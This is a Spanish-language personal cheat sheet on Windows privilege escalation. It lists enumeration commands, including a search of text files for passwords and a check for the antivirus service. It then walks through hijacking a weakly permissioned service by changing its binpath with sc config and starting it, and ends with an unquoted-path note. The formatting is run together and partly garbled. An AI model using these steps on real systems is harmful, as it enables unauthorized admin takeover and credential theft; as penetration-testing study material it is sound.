
Mi manual de conceptos de escalada de privilegios en Windows. Echa un vistazo a mi lista de reproducción, enlace: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
Un punto importante a tener en cuenta son los Grupos: cualquier usuario del grupo Administradores nos ayuda a escalar privilegios.
whoami /priv - privilegios del usuario actualnet users - lista todos los usuariosnet user <username> - muestra los detalles de un usuario específicoqwinsta - Otros usuarios con sesión iniciada simultáneamentenet localgroup - Grupos disponibles en el sistemanet localgroup <group-name> - lista los miembros de un grupo específicosysteminfo - proporciona toda la información sobre el sistema operativohostname - nombre de host del sistemafindstr /si password *.txt - buscamos los archivos que contengan 'password', y además en archivos de textowmic qfe get Caption,Description,HotFixID,InstalledOn - esto informa sobre los parches de seguridad e información relacionadanetstat -ano - conexiones asociadas con la máquinaschtasks /query /fo LIST /v - para buscar cualquier tarea programadadriverquery - lista la información relacionada con los controladoressc query windefend - busca el servicio de antivirussysteminfo en tu máquina; este es el único requisito para esta herramientawmic product get name,version,vendor - esto da el nombre del producto, la versión y el proveedor. Este comando en particular ofrece una visualización adecuada de lo que necesitamos.wmic service list brief | findstr "Running" y, para obtener más información sobre el servicio, usa sc qc <ServiceName>post/multi/recon/local_exploit_suggester; asegúrate de que tu sesión esté en segundo plano para que esta herramienta funcione correctamente, o simplemente puedes cargarlo desde meterpreter.winpeas.exe --helpsysteminfo y cópiala en un archivo con extensión .txtAquí intentaremos identificar servicios con permisos inseguros y luego podremos explotarlos.
Aquí podemos hacer uso del comando winpeas.exe servicesinfo y podemos ver los servicios que son bastante útiles
Una parte interesante de la salida es así,```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- Pero para obtener más información podemos usar una herramienta llamada **accesschk** que es de Microsoft, ejecútala de la siguiente manera `accesschk.exe /accepteula -uwcqv <current-user> <service>`, la salida es,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config, donde podemos cambiar la configuración del servicio.sc qc <service> y luego anota el Binary_path_name (también se puede llamar binpath), que vamos a cambiar (sonrisa malvada)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" y luego inicia el servicio sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.